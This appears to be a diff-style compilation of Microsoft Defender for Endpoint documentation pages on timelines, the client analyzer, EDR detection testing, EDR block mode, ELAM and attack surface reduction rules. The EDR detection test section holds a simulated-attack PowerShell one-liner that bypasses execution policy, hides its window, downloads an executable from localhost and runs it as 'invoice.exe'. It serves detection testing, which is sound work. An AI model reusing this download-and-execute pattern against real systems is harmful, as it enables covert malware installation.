-> Some information relates to a prereleased product feature in public preview which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.
-
-In Microsoft Defender for Endpoint, **Techniques** are an additional data type in the event timeline. Techniques provide more insight on activities associated with [MITRE ATT&CK](https://attack.mitre.org/) techniques or subtechniques.
-
-This feature simplifies the investigation experience by helping analysts understand the activities that were observed on a device. Analysts can then decide to investigate further.
-
-During preview, Techniques are available by default and shown together with events when a device's timeline is viewed.
--
-Techniques are highlighted in bold text and appear with a blue icon on the left. The corresponding MITRE ATT&CK ID and technique name also appear as tags under Additional information.
-
-Search and Export options are also available for Techniques.
-
-### Investigate using the side pane
-
-Select a Technique to open its corresponding side pane. Here you can see additional information and insights like related ATT&CK techniques, tactics, and descriptions.
-
-Select the specific *Attack technique* to open the related ATT&CK technique page where you can find more information about it.
-
-You can copy an entity's details when you see a blue icon on the right. For instance, to copy a related file's SHA1, select the blue page icon.
---
-You can do the same for command lines.
--
-### Investigate related events
-
-To use [advanced hunting](advanced-hunting-overview.md) to find events related to the selected Technique, select **Hunt for related events**. This leads to the advanced hunting page with a query to find events related to the Technique.
--
-> [!NOTE]
-> Querying using the **Hunt for related events** button from a Technique side pane displays all the events related to the identified technique but does not include the Technique itself in the query results.
-
-### Customize your device timeline
-
-On the upper right-hand side of the device timeline, you can choose a date range to limit the number of events and techniques in the timeline.
-
-You can customize which columns to expose. You can also filter for flagged events by data type or by event group.
-
-### Choose columns to expose
-
-You can choose which columns to expose in the timeline by selecting the **Choose columns** button.
---
-From there you can select which information set to include.
-
-### Filter to view techniques or events only
-
-To view only either events or techniques, select **Filters** from the device timeline and choose your preferred Data type to view.
--
-## Timeline event flags
-
-Event flags in the Defender for Endpoint device timeline help you filter and organize specific events when you're investigating potential attacks.
-
-The Defender for Endpoint device timeline provides a chronological view of the events and associated alerts observed on a device. This list of events provides full visibility into any events, files, and IP addresses observed on the device. The list can sometimes be lengthy. Device timeline event flags help you track events that could be related.
-
-After you've gone through a device timeline, you can sort, filter, and export the specific events that you flagged.
-
-While navigating the device timeline, you can search and filter for specific events. You can set event flags by:
--- Highlighting the most important events-- Marking events that require deep dive-- Building a clean breach timeline-
-## Flag an event
-
-1. Find the event that you want to flag.
-
-2. Select the flag icon in the Flag column.
--
-## View flagged events
-
-1. In the timeline **Filters** section, enable **Flagged events**.
-2. Select **Apply**. Only flagged events are displayed.
-
-You can apply more filters by clicking on the time bar. This will only show events prior to the flagged event.
-
security Download Client Analyzer https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/download-client-analyzer.md
- Title: Download the Microsoft Defender for Endpoint client analyzer
-description: Learn how to download the Microsoft Defender for Endpoint Client Analyzer on Windows, macOS, or Linux.
--- NOCSH------ m365-security-- tier2-- Previously updated : 02/21/2024--
-# Download the Microsoft Defender for Endpoint client analyzer
-
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-Learn how to download the Microsoft Defender for Endpoint client analyzer on supported Windows, macOS, and Linux Operating Systems.
-
-## Download client analyzer for Windows OS
-
-1. The latest stable edition is available for download from following URL: <https://aka.ms/MDEAnalyzer>
-2. The latest preview edition is available for download from following URL: <https://aka.ms/BetaMDEAnalyzer>
-
-## Download client analyzer for macOS or Linux
-
-1. The latest stable edition will be integrated into the MDE for Endpoint agent. Ensure that you are running the latest edition for either [macOS](mac-whatsnew.md) or [Linux](linux-whatsnew.md).
-
-2. The latest preview edition is available for direct download from following URL: <https://aka.ms/XMDEClientAnalyzer>
security Edr Detection https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/edr-detection.md
- Title: EDR detection test for verifying device's onboarding and reporting service
-description: EDR detection test to verify the device's proper onboarding and reporting to the service.
------- m365-security-- tier3-- mde-macos--- Previously updated : 01/15/2024--
-# EDR detection test for verifying device's onboarding and reporting services
-
-#### Applies to:
--- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Business](https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-business)-
-## Scenario requirements and setup
--- Windows 11, Windows 10 version 1709 build 16273 or newer, Windows 8.1, or Windows 7 SP1.-- Windows Server 2022, Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, and Windows Server 2008 R2 SP1.-- Linux-- macOS-- Microsoft Defender for Endpoint-- Microsoft Defender for Endpoint on Linux-- Microsoft Defender for Endpoint on macOS-
-Endpoint detection and response for Endpoint provide advanced attack detections that are near real-time and actionable. Security analysts can prioritize alerts effectively, gain visibility into the full scope of a breach, and take response actions to remediate threats.
-
-Run an EDR detection test to verify that the device is properly onboarded and reporting to the service. Perform the following steps on the newly onboarded device:
-
-### Windows
-
-1. Open a Command Prompt window
-
-2. At the prompt, copy and run the command below. The Command Prompt window will close automatically.
--
-```powershell
-powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-WDATP-test\\invoice.exe');Start-Process 'C:\\test-WDATP-test\\invoice.exe'
-```
-
-3. If successful, the detection test will be marked as completed and a new alert will appear in few minutes.
-
-### Linux
-
-1. Download [script file](https://aka.ms/LinuxDIY) to an onboarded Linux server
--
-```bash
-curl -o ~/Downloads/MDE Linux DIY.zip https://aka.ms/LinuxDIY
-```
-
-1. Extract the zip
-
-```bash
-unzip ~/Downloads/MDE Linux DIY.zip
-```
-
-1. And run the following command:
-
-```bash
-./mde_linux_edr_diy.sh
-```
-
-After a few minutes, a detection should be raised in Microsoft Defender XDR.
-
-3. Look at the alert details, machine timeline, and perform your typical investigation steps.
-
-### macOS
-
-1. In your browser, Microsoft Edge for Mac or Safari, download *MDATP MacOS DIY.zip* from [https://aka.ms/mdatpmacosdiy](https://aka.ms/mdatpmacosdiy) and extract.
-
- The following prompt appears:
-
- > Do you want to allow downloads on "mdatpclientanalyzer.blob.core.windows.net"?<br/>
- > You can change which websites can download files in **Websites Preferences**.
-
-4. Click **Allow**.
-
-5. Open **Downloads**.
-
-6. You must be able to see **MDATP MacOS DIY**.
-
- > [!TIP]
- > If you double-click **MDATP MacOS DIY**, you will get the following message:
- >
- > > **"MDATP MacOS DIY" cannot be opened because the developer cannot be verifier.**<br/>
- > > macOS cannot verify that this app is free from malware.<br/>
- > > **[Move to Trash]** **[Cancel]**
-
-7. Click **Cancel**.
-
-8. Right-click **MDATP MacOS DIY**, and then click **Open**.
-
- The system displays the following message:
-
- > **macOS cannot verify the developer of MDATP MacOS DIY. Are you sure you want to open it?**<br/>
- > By opening this app, you will be overriding system security which can expose your computer and personal information to malware that may harm your Mac or compromise your privacy.
-
-9. Click **Open**.
-
- The system will display the following message:
-
- > Microsoft Defender for Endpoint - macOS EDR DIY test file<br/>
- > Corresponding alert will be available in the MDATP portal.
-
-10. Click **Open**.
-
- In few minutes, an alert *macOS EDR Test Alert* is raised.
-
-11. Go to Microsoft Defender portal (https://security.microsoft.com/).
-
-12. Go to the **Alert** Queue.
-
- :::image type="content" source="media/b8db76c2-c368-49ad-970f-dcb87534d9be.png" alt-text="Screenshot that shows a macOS EDR test alert that shows severity, category, detection source, and a collapsed menu of actions":::
-
- The macOS EDR test alert shows severity, category, detection source, and a collapsed menu of actions.
-
- Look at the alert details and the device timeline, and perform the regular investigation steps.
-
- Next steps that you can consider performing are to add AV exclusions as needed for application compatibility or performance:
--- [Configure and validate exclusions for Microsoft Defender for Endpoint on macOS](mac-exclusions.md)-- [Address false positives/negatives in Microsoft Defender for Endpoint](defender-endpoint-false-positives-negatives.md)-- [Manage suppression rules](manage-suppression-rules.md)-- [Create indicators of compromise (IoC)](manage-indicators.md)-- [Create and manage custom detections rules](../defender/custom-detection-rules.md)-
-Read through [Microsoft Defender for Endpoint Security Operations Guide](mde-sec-ops-guide.md).
security Edr In Block Mode https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/edr-in-block-mode.md
- Title: Endpoint detection and response in block mode
-description: Learn about endpoint detection and response in block mode
---------- next-gen-- mde-edr-- admindeeplinkDEFENDER Previously updated : 04/11/2024--- m365-security-- tier2-- mde-edr--
-# Endpoint detection and response in block mode
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- Microsoft Defender Antivirus-
-**Platforms**
--- Windows-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-assignaccess-abovefoldlink)
-
-This recommendation is primarily for devices using an active non-Microsoft antivirus solution (with Microsoft Defender Antivirus in passive mode). There is little benefit to enabling EDR in block mode when Microsoft Defender Antivirus is the primary antivirus solution on devices.
-
-## What is EDR in block mode?
-
-[Endpoint detection and response](overview-endpoint-detection-response.md) (EDR) in block mode provides added protection from malicious artifacts when Microsoft Defender Antivirus is not the primary antivirus product and is running in passive mode. EDR in block mode is available in Defender for Endpoint Plan 2.
-
-> [!IMPORTANT]
-> EDR in block mode cannot provide all available protection when Microsoft Defender Antivirus real-time protection is in passive mode. Some capabilities that depend on Microsoft Defender Antivirus to be the active antivirus solution will not work, such as the following examples:
->
-> - Real-time protection, including on-access scanning, and scheduled scan is not available when Microsoft Defender Antivirus is in passive mode. To learn more about real-time protection policy settings, see **[Enable and configure Microsoft Defender Antivirus always-on protection](configure-real-time-protection-microsoft-defender-antivirus.md)**.
-> - Features like **[network protection](network-protection.md)** and **[attack surface reduction rules](attack-surface-reduction.md)** and indicators (file hash, ip address, URL, and certificates) are only available when Microsoft Defender Antivirus is running in active mode.
-> It is expected that your non-Microsoft antivirus solution includes these capabilities.
-
-EDR in block mode works behind the scenes to remediate malicious artifacts that were detected by EDR capabilities. Such artifacts might have been missed by the primary, non-Microsoft antivirus product. EDR in block mode allows Microsoft Defender Antivirus to take actions on post-breach, behavioral EDR detections.
-
-EDR in block mode is integrated with [threat & vulnerability management](next-gen-threat-and-vuln-mgt.md) capabilities. Your organization's security team gets a [security recommendation](tvm-security-recommendation.md) to turn EDR in block mode on if it isn't already enabled.
--
-> [!TIP]
-> To get the best protection, make sure to **[deploy Microsoft Defender for Endpoint baselines](configure-machines-security-baseline.md)**.
-
-Watch this video to learn why and how to turn on endpoint detection and response (EDR) in block mode, enable behavioral blocking, and containment at every stage from pre-breach to post-breach.
-> [!VIDEO https://www.microsoft.com/en-us/videoplayer/embed/RE4HjW2]
-
-## What happens when something is detected?
-
-When EDR in block mode is turned on, and a malicious artifact is detected, Defender for Endpoint remediates that artifact. Your security operations team sees the detection status as **Blocked** or **Prevented** in the [Action center](respond-machine-alerts.md#check-activity-details-in-action-center), listed as completed actions. The following image shows an instance of unwanted software that was detected and remediated through EDR in block mode:
--
-## Enable EDR in block mode
-
-> [!IMPORTANT]
-> - Make sure the [requirements](#requirements-for-edr-in-block-mode) are met before turning on EDR in block mode.
-> - Defender for Endpoint Plan 2 licenses are required.
-> - Beginning with [platform version 4.18.2202.X](microsoft-defender-antivirus-updates.md), you can set EDR in block mode to target specific device groups using Intune CSPs. You can continue to set EDR in block mode tenant-wide in the [Microsoft Defender portal](https://security.microsoft.com).
-> - EDR in block mode is primarily recommended for devices that are running Microsoft Defender Antivirus in passive mode (a non-Microsoft antivirus solution is installed and active on the device).
-
-<a name='microsoft-365-defender'></a>
-
-### Microsoft Defender portal
-
-1. Go to the Microsoft Defender portal ([https://security.microsoft.com/](https://security.microsoft.com/)) and sign in.
-
-2. Choose **Settings** \> **Endpoints** \> **General** \> **Advanced features**.
-
-3. Scroll down, and then turn on **Enable EDR in block mode**.
-
-### Intune
-
-To create a custom policy in Intune, see [Deploy OMA-URIs to target a CSP through Intune, and a comparison to on-premises](/troubleshoot/mem/intune/deploy-oma-uris-to-target-csp-via-intune).
-
-For more information on the Defender CSP used for EDR in block mode, see "Configuration/PassiveRemediation" under [Defender CSP](/windows/client-management/mdm/defender-csp).
-
-## Requirements for EDR in block mode
-
-The following table lists requirements for EDR in block mode:
-
-|Requirement|Details|
-|||
-|Permissions|You must have either the Global Administrator or Security Administrator role assigned in [Microsoft Entra ID](/azure/active-directory/fundamentals/active-directory-users-assign-role-azure-portal). For more information, see [Basic permissions](basic-permissions.md).|
-|Operating system|Devices must be running one of the following versions of Windows: <br/>- Windows 11<br/>- Windows 10 (all releases)<br/>- Windows Server 2019 or later<br/>- Windows Server, version 1803 or later<br/>- Windows Server 2016 and Windows Server 2012 R2 (with the [new unified client solution](configure-server-endpoints.md#new-windows-server-2012-r2-and-2016-functionality-in-the-modern-unified-solution))|
-|Microsoft Defender for Endpoint Plan 2|Devices must be onboarded to Defender for Endpoint. See the following articles: <br/>- [Minimum requirements for Microsoft Defender for Endpoint](minimum-requirements.md)<br/>- [Onboard devices and configure Microsoft Defender for Endpoint capabilities](onboard-configure.md)<br/>- [Onboard Windows servers to the Defender for Endpoint service](configure-server-endpoints.md)<br/>- [New Windows Server 2012 R2 and 2016 functionality in the modern unified solution](configure-server-endpoints.md#new-windows-server-2012-r2-and-2016-functionality-in-the-modern-unified-solution)<br/>(See [Is EDR in block mode supported on Windows Server 2016 and Windows Server 2012 R2?](edr-block-mode-faqs.yml)) |
-|Microsoft Defender Antivirus|Devices must have Microsoft Defender Antivirus installed and running in either active mode or passive mode. [Confirm Microsoft Defender Antivirus is in active or passive mode](edr-block-mode-faqs.yml).|
-|Cloud-delivered protection|Microsoft Defender Antivirus must be configured such that [cloud-delivered protection is enabled](enable-cloud-protection-microsoft-defender-antivirus.md).|
-|Microsoft Defender Antivirus platform|Devices must be up to date. To confirm, using PowerShell, run the [Get-MpComputerStatus](/powershell/module/defender/get-mpcomputerstatus) cmdlet as an administrator. In the **AMProductVersion** line, you should see **4.18.2001.10** or above. <br/><br/> To learn more, see [Manage Microsoft Defender Antivirus updates and apply baselines](microsoft-defender-antivirus-updates.md).|
-|Microsoft Defender Antivirus engine|Devices must be up to date. To confirm, using PowerShell, run the [Get-MpComputerStatus](/powershell/module/defender/get-mpcomputerstatus) cmdlet as an administrator. In the **AMEngineVersion** line, you should see **1.1.16700.2** or above. <br/><br/> To learn more, see [Manage Microsoft Defender Antivirus updates and apply baselines](microsoft-defender-antivirus-updates.md).|
-
-> [!IMPORTANT]
-> To get the best protection value, make sure your antivirus solution is configured to receive regular updates and essential features, and that your [exclusions are configured](configure-exclusions-microsoft-defender-antivirus.md). EDR in block mode respects exclusions that are defined for Microsoft Defender Antivirus, but not [indicators](manage-indicators.md) that are defined for Microsoft Defender for Endpoint.
-
-## See also
--- [Endpoint detection and response (EDR) in block mode frequently asked questions (FAQ)](edr-block-mode-faqs.yml)--
security Elam On Mdav https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/elam-on-mdav.md
- Title: Early Launch Antimalware (ELAM) and Microsoft Defender Antivirus
-description: How Microsoft Defender Antivirus incorporates Early Launch Antimalware (ELAM) for preventing rootkit and drivers with malware from loading before the antivirus service and drivers are loaded.
------ Previously updated : 02/26/2024----
-# Early Launch Antimalware (ELAM) and Microsoft Defender Antivirus
-
-**Applies to:**
-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- Microsoft Defender for Business-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- Microsoft Defender for Individual-
-**Platforms:**
-- Windows 11, Windows 10, Windows 8.1, Windows 8-- Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, Windows Server 2012-
-Detecting malware that starts early in the boot cycle was a challenge before Windows 8. In August 2012, Microsoft Defender Antivirus (MDAV) for Windows 8 or later, and Windows Server 2012 and later incorporated a new feature called the [Early Launch Antimalware (ELAM)](/windows/compatibility/early-launch-antimalware) driver. ELAM combats early boot threats (for example, rootkits or malicious drivers that can hide from detection) by using a Wdboot.sys driver that starts before other boot-start drivers. ELAM enables the evaluation of other drivers, and helps the Windows kernel decide whether those drivers should be initialized.
-
-## Where are the ELAM detections logged?
-
-The ELAM detection is logged in the same location as the other Microsoft Defender Antivirus threats, such as [Event ID 1006](/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus).
-
-## How do I keep the MDAV ELAM driver up to date?
-
-The MDAV ELAM driver ships with the monthly ΓÇ£[Platform update](/microsoft-365/security/defender-endpoint/microsoft-defender-antivirus-updates).ΓÇ¥
-
-## Can the Early Launch Antimalware (ELAM) policy be modified?
-
-ELAM can be modified here:
-
-**Computer Configuration** \> **Administrative Templates** \> **System** \> **Early Launch Antimalware**
-
-## How can I check that the MDAV ELAM driver is loaded?
-
-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\EarlyLaunch
-BackupPath (string) C:\Windows\\[ELAMBKUP](/windows-hardware/drivers/install/elam-driver-requirements)\WdBoot.sys (value)
-
-## How do I revert the MDAV ELAM driver to a previous version?
-
-C:\ProgramData\Microsoft\Windows Defender\Platform\<antimalware platform version>\MpCmdRun.exe -[RevertPlatform](/microsoft-365/security/defender-endpoint/command-line-arguments-microsoft-defender-antivirus).
-
-For example:
-
-```dos
-C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24010.12-0\MpCmdRun.exe -RevertPlatform
-```
security Enable Attack Surface Reduction https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/enable-attack-surface-reduction.md
- Title: Enable attack surface reduction rules
-description: Enable attack surface reduction rules to protect your devices from attacks that use macros, scripts, and common injection techniques.
--------- m365-security-- tier2-- mde-asr- Previously updated : 02/12/2024--
-# Enable attack surface reduction rules
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- Microsoft Defender Antivirus-
-**Platforms**
-- Windows-
-> [!TIP]
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-assignaccess-abovefoldlink)
-
-[Attack surface reduction rules](attack-surface-reduction.md) help prevent actions that malware often abuses to compromise devices and networks.
-
-## Requirements
-
-Attack surface reduction features across Windows versions
-
-You can set attack surface reduction rules for devices that are running any of the following editions and versions of Windows:
--- [Windows 11 Pro](/windows/whats-new/windows-11-overview)-- [Windows 11 Enterprise](https://www.microsoft.com/microsoft-365/windows/windows-11-enterprise)-- Windows 10 Pro, [version 1709](/windows/whats-new/whats-new-windows-10-version-1709) or later-- Windows 10 Enterprise, [version 1709](/windows/whats-new/whats-new-windows-10-version-1709) or later-- Windows Server, [version 1803 (Semi-Annual Channel)](/windows-server/get-started/whats-new-in-windows-server-1803) or later-- [Windows Server 2012 R2](/windows/win32/srvnodes/what-s-new-for-windows-server-2012-r2)-- [Windows Server 2016](/windows-server/get-started/whats-new-in-windows-server-2016)-- [Windows Server 2019](/windows-server/get-started-19/whats-new-19)-- [Windows Server 2022](/windows-server/get-started/whats-new-in-windows-server-2022)-
-To use the entire feature-set of attack surface reduction rules, you need:
--- Microsoft Defender Antivirus as primary AV (real-time protection on)-- [Cloud-Delivery Protection](/windows/security/threat-protection/microsoft-defender-antivirus/enable-cloud-protection-microsoft-defender-antivirus) on (some rules require that)-- Windows 10 Enterprise E5 or E3 License-
-Although attack surface reduction rules don't require a [Windows E5 license](/windows/deployment/deploy-enterprise-licenses), with a Windows E5 license, you get advanced management capabilities including monitoring, analytics, and workflows available in Defender for Endpoint, as well as reporting and configuration capabilities in the [Microsoft Defender XDR](https://go.microsoft.com/fwlink/p/?linkid=2077139) portal. These advanced capabilities aren't available with an E3 license, but you can still use Event Viewer to review attack surface reduction rule events.
-
-Each attack surface reduction rule contains one of four settings:
--- **Not configured** | **Disabled**: Disable the attack surface reduction rule-- **Block**: Enable the attack surface reduction rule-- **Audit**: Evaluate how the attack surface reduction rule would impact your organization if enabled-- **Warn**: Enable the attack surface reduction rule but allow the end user to bypass the block-
-We recommend using attack surface reduction rules with a Windows E5 license (or similar licensing SKU) to take advantage of the advanced monitoring and reporting capabilities available in [Microsoft Defender for Endpoint](microsoft-defender-endpoint.md) (Defender for Endpoint). However, if you have another license, such as Windows Professional or Windows E3 that doesn't include advanced monitoring and reporting capabilities, you can develop your own monitoring and reporting tools on top of the events that are generated at each endpoint when attack surface reduction rules are triggered (for example, Event Forwarding).
-
-> [!TIP]
-> To learn more about Windows licensing, see [Windows 10 Licensing](https://www.microsoft.com/licensing/product-licensing/windows10?activetab=windows10-pivot:primaryr5) and get the [Volume Licensing guide for Windows 10](https://www.microsoft.com/en-us/download/details.aspx?id=11091).
-
-You can enable attack surface reduction rules by using any of these methods:
--- [Microsoft Intune](#intune)-- [Mobile Device Management (MDM)](#mdm)-- [Microsoft Configuration Manager](#microsoft-configuration-manager)-- [Group Policy](#group-policy)-- [PowerShell](#powershell)-
-Enterprise-level management such as Intune or Microsoft Configuration Manager is recommended. Enterprise-level management overwrites any conflicting Group Policy or PowerShell settings on startup.
-
-## Exclude files and folders from attack surface reduction rules
-
-You can exclude files and folders from being evaluated by most attack surface reduction rules. This means that even if an attack surface reduction rule determines the file or folder contains malicious behavior, it doesn't block the file from running.
-
-> [!IMPORTANT]
-> Excluding files or folders can severely reduce the protection provided by attack surface reduction rules. Excluded files will be allowed to run, and no report or event will be recorded. If attack surface reduction rules are detecting files that you believe shouldn't be detected, you should [use audit mode first to test the rule](attack-surface-reduction-rules-deployment-test.md#step-1-test-attack-surface-reduction-rules-using-audit).
-An exclusion is applied only when the excluded application or service starts. For example, if you add an exclusion for an update service that is already running, the update service continues to trigger events until the service is stopped and restarted.
-
-When adding exclusions, keep these points in mind:
-
-* Exclusions are typically based on individual files or folders (using folder paths or the full path of the file to be excluded).
-* Exclusion paths can use environment variables and wildcards. See [Use wildcards in the file name and folder path or extension exclusion lists](configure-extension-file-exclusions-microsoft-defender-antivirus.md#use-wildcards-in-the-file-name-and-folder-path-or-extension-exclusion-lists)
-* When deployed through Group Policy or PowerShell, exclusions apply to all attack surface reduction rules. Using Intune, it is possible to configure an exclusion for a specific attack surface reduction rule. See [Configure attack surface reduction rules per-rule exclusions](attack-surface-reduction-rules-deployment-test.md#configure-attack-surface-reduction-per-rule-exclusions)
-* Exclusions can be added based on certificate and file hashes, by allowing specified Defender for Endpoint file and certificate indicators. See [Manage indicators](manage-indicators.md).
-
-## Policy Conflict
-
-1. If a conflicting policy is applied via MDM and GP, the setting applied from GP takes precedence.
-
-1. Attack surface reduction rules for managed devices now support behavior for merger of settings from different policies, to create a superset of policy for each device. Only the settings that aren't in conflict are merged, while those that are in conflict aren't added to the superset of rules. Previously, if two policies included conflicts for a single setting, both policies were flagged as being in conflict, and no settings from either profile would be deployed. Attack surface reduction rule merge behavior is as follows:
- - Attack surface reduction rules from the following profiles are evaluated for each device to which the rules apply:
- - Devices > Configuration profiles > Endpoint protection profile > **Microsoft Defender Exploit Guard** > [Attack Surface Reduction](/mem/intune/protect/endpoint-protection-windows-10#attack-surface-reduction-rules).
- - Endpoint security > **Attack surface reduction policy** > [Attack surface reduction rules](/mem/intune/protect/endpoint-security-asr-policy#devices-managed-by-intune).
- - Endpoint security > Security baselines > **Microsoft Defender ATP Baseline** > [Attack Surface Reduction Rules](/mem/intune/protect/security-baseline-settings-defender-atp#attack-surface-reduction-rules).
- - Settings that don't have conflicts are added to a superset of policy for the device.
- - When two or more policies have conflicting settings, the conflicting settings aren't added to the combined policy, while settings that don't conflict are added to the superset policy that applies to a device.
- - Only the configurations for conflicting settings are held back.
-
-## Configuration methods
-
-This section provides configuration details for the following configuration methods:
--- [Intune](#intune)-- [Custom profile in Intune](#custom-profile-in-intune)-- [MDM](#mdm)-- [Microsoft Configuration Manager](#microsoft-configuration-manager)-- [Group Policy](#group-policy)-- [PowerShell](#powershell)-
-The following procedures for enabling attack surface reduction rules include instructions for how to exclude files and folders.
-
-### Intune
-
-#### Device Configuration Profiles
-
-1. Select **Device configuration** > **Profiles**. Choose an existing endpoint protection profile or create a new one. To create a new one, select **Create profile** and enter information for this profile. For **Profile type**, select **Endpoint protection**. If you've chosen an existing profile, select **Properties** and then select **Settings**.
-
-1. In the **Endpoint protection** pane, select **Windows Defender Exploit Guard**, then select **Attack Surface Reduction**. Select the desired setting for each attack surface reduction rule.
-
-1. Under **Attack Surface Reduction exceptions**, enter individual files and folders. You can also select **Import** to import a CSV file that contains files and folders to exclude from attack surface reduction rules. Each line in the CSV file should be formatted as follows:
-
- `C:\folder`, `%ProgramFiles%\folder\file`, `C:\path`
-
-4. Select **OK** on the three configuration panes. Then select **Create** if you're creating a new endpoint protection file or **Save** if you're editing an existing one.
-
-#### Endpoint security policy
-
-1. Select **Endpoint Security** > **Attack surface reduction**. Choose an existing attack surface reduction rule or create a new one. To create a new one, select **Create Policy** and enter information for this profile. For **Profile type**, select **Attack surface reduction rules**. If you've chosen an existing profile, select **Properties** and then select **Settings**.
-
-2. In the **Configuration settings** pane, select **Attack Surface Reduction** and then select the desired setting for each attack surface reduction rule.
-
-3. Under **List of additional folders that need to be protected**, **List of apps that have access to protected folders**, and **Exclude files and paths from attack surface reduction rules**, enter individual files and folders. You can also select **Import** to import a CSV file that contains files and folders to exclude from attack surface reduction rules. Each line in the CSV file should be formatted as follows:
-
- `C:\folder`, `%ProgramFiles%\folder\file`, `C:\path`
-
-4. Select **Next** on the three configuration panes, then select **Create** if you're creating a new policy or **Save** if you're editing an existing policy.
-
-### Custom profile in Intune
-
-You can use Microsoft Intune OMA-URI to configure custom attack surface reduction rules. The following procedure uses the rule [Block abuse of exploited vulnerable signed drivers](attack-surface-reduction-rules-reference.md#block-abuse-of-exploited-vulnerable-signed-drivers) for the example.
-
-1. Open the Microsoft Intune admin center. In the **Home** menu, click **Devices**, select **Configuration profiles**, and then click **Create profile**.
-
- :::image type="content" source="media/mem01-create-profile.png" alt-text="The Create profile page in the Microsoft Intune admin center portal." lightbox="media/mem01-create-profile.png":::
-
-2. In **Create a profile**, in the following two drop-down lists, select the following:
-
- - In **Platform**, select **Windows 10 and later**
- - In **Profile type**, select **Templates**
- - If attack surface reduction rules are already set through Endpoint security, in **Profile type**, select **Settings Catalog**.
-
- Select **Custom**, and then select **Create**.
-
- :::image type="content" source="media/mem02-profile-attributes.png" alt-text="The rule profile attributes in the Microsoft Intune admin center portal." lightbox="media/mem02-profile-attributes.png":::
-
-3. The Custom template tool opens to step **1 Basics**. In **1 Basics**, in **Name**, type a name for your template, and in **Description** you can type a description (optional).
-
- :::image type="content" source="media/mem03-1-basics.png" alt-text="The basic attributes in the Microsoft Intune admin center portal" lightbox="media/mem03-1-basics.png":::
-
-4. Click **Next**. Step **2 Configuration settings** opens. For OMA-URI Settings, click **Add**. Two options now appear: **Add** and **Export**.
-
- :::image type="content" source="media/mem04-2-configuration-settings.png" alt-text="The configuration settings in the Microsoft Intune admin center portal." lightbox="media/mem04-2-configuration-settings.png":::
-
-1. Click **Add** again. The **Add Row OMA-URI Settings** opens. In **Add Row**, do the following:
-
- - In **Name**, type a name for the rule.
- - In **Description**, type a brief description.
- - In **OMA-URI**, type or paste the specific OMA-URI link for the rule that you're adding. Refer to the MDM section in this article for the OMA-URI to use for this example rule. For attack surface reduction rule GUIDS, see [Per rule descriptions](attack-surface-reduction-rules-reference.md#per-rule-descriptions) in the article: Attack surface reduction rules.
- - In **Data type**, select **String**.
- - In **Value**, type or paste the GUID value, the \= sign and the State value with no spaces (_GUID=StateValue_). Where:
-
- - 0: Disable (Disable the attack surface reduction rule)
- - 1: Block (Enable the attack surface reduction rule)
- - 2: Audit (Evaluate how the attack surface reduction rule would impact your organization if enabled)
- - 6: Warn (Enable the attack surface reduction rule but allow the end-user to bypass the block)
-
- :::image type="content" source="media/mem05-add-row-oma-uri.png" alt-text="The OMA URI configuration in the Microsoft Intune admin center portal" lightbox="media/mem05-add-row-oma-uri.png":::
-
-1. Select **Save**. **Add Row** closes. In **Custom**, select **Next**. In step **3 Scope tags**, scope tags are optional. Do one of the following:
-
- - Select **Select Scope tags**, select the scope tag (optional) and then select **Next**.
- - Or select **Next**
-
-1. In step **4 Assignments**, in **Included Groups**, for the groups that you want this rule to apply, select from the following options:
-
- - **Add groups**
- - **Add all users**
- - **Add all devices**
-
- :::image type="content" source="media/mem06-4-assignments.png" alt-text="The assignments in the Microsoft Intune admin center portal" lightbox="media/mem06-4-assignments.png":::
-
-1. In **Excluded groups**, select any groups that you want to exclude from this rule, and then select **Next**.
-
-1. In step **5 Applicability Rules** for the following settings, do the following:
-
- - In **Rule**, select either **Assign profile if**, or **Don't assign profile if**
-
- - In **Property**, select the property to which you want this rule to apply
- - In **Value**, enter the applicable value or value range
-
- :::image type="content" source="media/mem07-5-applicability-rules.png" alt-text="The applicability rules in the Microsoft Intune admin center portal" lightbox="media/mem07-5-applicability-rules.png":::
-
-10. Select **Next**. In step **6 Review + create**, review the settings and information you've selected and entered, and then select **Create**.
-
